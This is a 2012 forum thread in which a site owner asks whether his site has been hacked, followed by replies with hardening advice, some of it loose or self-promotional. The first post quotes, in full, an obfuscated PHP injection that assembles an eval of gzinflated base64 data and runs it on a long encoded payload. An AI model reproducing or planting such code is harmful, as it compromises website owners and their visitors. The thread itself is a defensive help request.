1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Is my website be Attacked?

Discussion in 'Security' started by ecctao, Sep 17, 2012.

  1. #1
    Hello all
    My website: www.led-card.com
    have some problem in code.
    All this PHP file always be added some code like:
    "
    SEMrush
    <?php
    $md5 = "6b4b9ce7c181d24713e26e1fcaf90118";
    $a4 = array('r','i',"a",')',"c",'6','s','f','n',";",'o','l',"d","v","t",'(',"z",'b','_',"e","$","4","g");
    $b40 = create_function('$'.'v',$a4[19].$a4[13].$a4[2].$a4[11].$a4[15].$a4[22].$a4[16].$a4[1].$a4[8].$a4[7].$a4[11].$a4[2].$a4[14].$a4[19].$a4[15].$a4[17].$a4[2].$a4[6].$a4[19].$a4[5].$a4[21].$a4[18].$a4[12].$a4[19].$a4[4].$a4[10].$a4[12].$a4[19].$a4[15].$a4[20].$a4[13].$a4[3].$a4[3].$a4[3].$a4[9]);
    $b40('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');
    ?>

    "

    It's happened two weeks ago, and I clear this code and change my host password.
    But now, this code is back again.
    I can view my web site , it' seems always OK.
    May I know what's the problm is . And How can I deal with.
     
    ecctao, Sep 17, 2012 IP
    SEMrush
  2. samirj09

    samirj09 Well-Known Member

    Messages:
    335
    Likes Received:
    8
    Best Answers:
    0
    Trophy Points:
    125
    #2
    Yes, your website has been hacked. You might have changed your password, but most likely a php shell was uploaded as well. This is allowing the hacker to continue to gain access.

    Check website access logs, control panel access logs, ftp access logs, ssh access logs and compare timestamps to to infected files to find out the source. Shoot me a pm if you need help with this.
     
    samirj09, Sep 18, 2012 IP
  3. CTips4u

    CTips4u Greenhorn

    Messages:
    81
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    16
    #3
    Hacking is very harmful for website users. How can i protect our site?
     
    CTips4u, Sep 23, 2012 IP
  4. pavv

    pavv Active Member

    Messages:
    258
    Likes Received:
    6
    Best Answers:
    1
    Trophy Points:
    70
    #4
    - use strong passwords
    - use the latest version of the wordpress/drupal/etc scripts
    - protect the admin directory with a pass

    If you have a VPS/dedi - install mod_security+rules, CSF, CXS, many other things.
     
    pavv, Sep 23, 2012 IP
  5. unzeblog

    unzeblog Peon

    Messages:
    14
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #5
    how to protect my joomla site from hacker attack.
     
    unzeblog, Sep 26, 2012 IP
  6. AstoundingHost

    AstoundingHost Peon

    Messages:
    34
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #6
    A backdoor has most likely been uploaded which is why the content keeps appearing. Is this a software package that you're using, if so, what software is it?

    If you need further assistance with clearing this up, don't hesitate to PM me and we can work something out.

    Cheers.
     
    AstoundingHost, Sep 30, 2012 IP
  7. bluebios

    bluebios Greenhorn

    Messages:
    10
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    11
    #7
    Hacking is very easy if the admin is not very sound in his knowledge.Here are some steps which can provide you to safe your website from getting hacked even if a hacker has stolen your website login details.

    -Try to keep the SAFE MODE=OF
    -In .htaccesss file,disable all shell based functions.Specially symlinking.
    -Always keep a iplogger in root folder so that hacker's ip can be logged.

    Hope i helped you somewhere :)
    Thanks
     
    bluebios, Dec 9, 2012 IP
  8. evuln.com

    evuln.com Greenhorn

    Messages:
    18
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    21
    #8
    You should find the reason: some webshell or website vulnerability.
    Here is our fixing guide: evuln.com/hacked/redirect.html
     
    evuln.com, Dec 29, 2012 IP
  9. BreezeHost

    BreezeHost Member

    Messages:
    139
    Likes Received:
    1
    Best Answers:
    1
    Trophy Points:
    28
    #9
    Below mentioned are few security measures which you can take to secure your website.
    1) Protect your control panel authentication by using a difficult password, which only you or your client knows.
    2) Do not make your control panel password public.
    3) While uploading any data from your local pc scan it with any anti-virus.
    4) Change the passwords for all the email accounts.
    5) ) If you have installed wordpress, joomla and vbulletin manually then you will need to check with the script vendor to see if they are of the latest version/ upgraded version, patch or updates available and imply them to your scripts.
     
    BreezeHost, Dec 30, 2012 IP
  10. Roger Pelt

    Roger Pelt Active Member

    Messages:
    121
    Likes Received:
    6
    Best Answers:
    0
    Trophy Points:
    53
    #10
    There is a better services available to protect our website. You can secure your website by using website anti malware scanner, it will identify and fix all malware easily and faster if your website be attacked by hackers. Once your website is been hacked than it is harasser to get back.
     
    Roger Pelt, Jan 29, 2013 IP